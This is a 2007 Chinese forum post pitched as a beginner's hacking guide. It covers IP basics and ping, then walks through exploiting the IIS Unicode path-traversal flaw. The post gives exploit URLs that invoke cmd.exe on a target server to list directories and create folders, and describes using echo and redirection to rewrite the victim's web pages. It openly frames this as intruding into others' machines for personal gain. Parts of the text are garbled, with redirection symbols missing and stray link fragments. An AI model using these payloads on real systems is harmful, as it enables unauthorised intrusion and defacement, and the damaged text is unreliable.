网络黑客新手入门必备知识

2007-09-28 12:29:59 被7人转藏

小贴士:袋主人体历险记，你对自己的身体了解多少

　　楼主 大 中 小 发表于 2007-6-23 00:51

第1楼

　　网络黑客新手入门必备知识

各位网络新手，大家好。为了新手们更快的进入奇妙的网络世界，我决定写一篇指导文章。其实我也是个菜鸟，对网络也是略知一二，第一次写教程，有不足之处，肯请赐教。相信会花时间看这篇文章的人，都是对入侵一知半解的。其实，我个人认为，微软的Windows 2K和NT是世界上应用范围很广，最容易学习的一种操作系统（OS），同时也是漏洞最多的OS，作为新手，我建议大家从2K和NT的入侵开始学起。我会陆续介绍有关入侵的手段及入侵后可以做的有利于自己的事。: ） 系统基本知识 1.a.什么是IP:要是真的想说清楚什么是IP，那是一项很繁重的工作。简单的来说，IP就是所有Internet或是局域网上的主机的身份证。所有网络的机器连接起来后，每台机器都会有一个唯一的合法的IP地址，一台机器和别的指定的机器通讯都要依据IP来实现的。IP地址的写法为XXX.XXX.XXX.XXX。有四段数字组成，第一段数字可为1-255,后三段数字可为0-255，且所有的IP地址分为A、B、C、D、E五类，主要是A、B、C三类。其有效范围如下表所示： 类别 网络号 主机号 A 1～126 0～255 0～255 1～254 B 128～191 0～255 0～255 1～254 C 192～223 0～255 0～255 1～254 有关IP地址的问题可以查阅相关的资料，笔者在此就不再多耗笔墨了。呵呵~~~~~~~~~~~~~: p 1.b.怎样得到自己和别人的IP呢？以Windows 98为例：在“开始”—“运行”里输入：winipcfg。接着，Windows就会打开“IP 配置”。其中，在“Ethernet 适配器信息”—“IP 地址”会显示xxx.xxx.xxx.xxx,这就是你的IP。要想得到别人的IP，可以使用一些工具软件，不过最简单的使用Windows自带的一个小程序ping.exe。在MS-DOS命令行下输入ping www.xxx.com。会出现： C:\ping www.xxx.com Pinging www.xxx.com [xxx.xxx.xxx.xxx] with 32 bytes of data: Reply from xxx.xxx.xxx.xxx: bytes=32 time=630ms TTL=116 Reply from xxx.xxx.xxx.xxx: bytes=32 time=630ms TTL=116 Reply from xxx.xxx.xxx.xxx: bytes=32 time=120ms TTL=116 Ping statistics for xxx.xxx.xxx.xxx: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 120ms, Maximum = 630ms, Average = 187ms 其中：xxx.xxx.xxx.xxx 就是 http://www.xxx.com的网络服务器的IP地址。 href="http://www.enet.com.cn/eschool/inforcenter/A20041220373873.html" 2.a.Unicode漏洞：“Unicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。下面我们来简要介绍一下它的原理。 IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。当IIS打开文件时，如果该文件名包含Unicode字符，它会对其进行解码，如果用户提供一些特殊的编码，将导致IIS错误的打开或者执行某些web根目录以外的文件。攻击者可以利用这个漏洞来绕过IIS的路径检查，去执行或者打开任意的文件。此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，台湾繁体中文也同样存在这样的漏洞。（Win NT4 编码为：%c1%9c ，Win2000 英文版 编码为：%c0%af） 假设目标主机为英文版Winodows 2k，IP为xxx.xxx.xxx.xxx，且存在Unicode漏洞，那么我们在浏览器里输入： http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir ，之后浏览器就会显示如下内容： Directory of C:\inetpub\scripts 2002-02-08 15:49 〈DIR〉 . 2002-02-08 15:49 〈DIR〉 .. 2002-02-08 10:20 Index.html 2002-02-08 10:20 background.jpg ........................................ 从上面的测试可以看出："http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+"后就是DOS命令了："dir" 以此类推，我们可以利用浏览器远程执行任意命令，看下面的例子： 在浏览器里输入http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+md+d:\Nature,运行后我们可以看到返回这样的结果： CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: 英文意思是： CGI错误 具体的CGI申请有误，不能返回完整的HTTP标题，返回的标题为： 但是，你其实仍然在目标主机的 D:\ 里建立了一个名为:Nature的文件夹。 2.b.利用Unicode漏洞我们还可以简单的修改目标主机的WEB文件。一般情况下，我们要修改目标主机的web文件，常用到的方法是利用echo回显、管道工具“” “”。如果你对这些命令不熟悉，可以键入以下命令以查看帮助文档，如： C:\echo/? 显示信息，或将命令响应打开或关上。 ECHO [ON OFF] ECHO [message] 仅键入 ECHO 而不加参数，可以显示当前的 ECHO 设置。 管道工具“” “” 的不同之处 “”“”是将命令产生的输出重新定向,比如写到某个文件或输出到打印机中。 “”将产生的内容追加进文件中，“”则将原文件内容覆盖。 href="http://www.enet.com.cn/eschool/inforcenter/A20041220373873.html"来源enet论坛

第2楼

　　一直为18Q，永远为18Q!!

第3楼

　　楼主 大 中 小 发表于 2007-6-23 00:51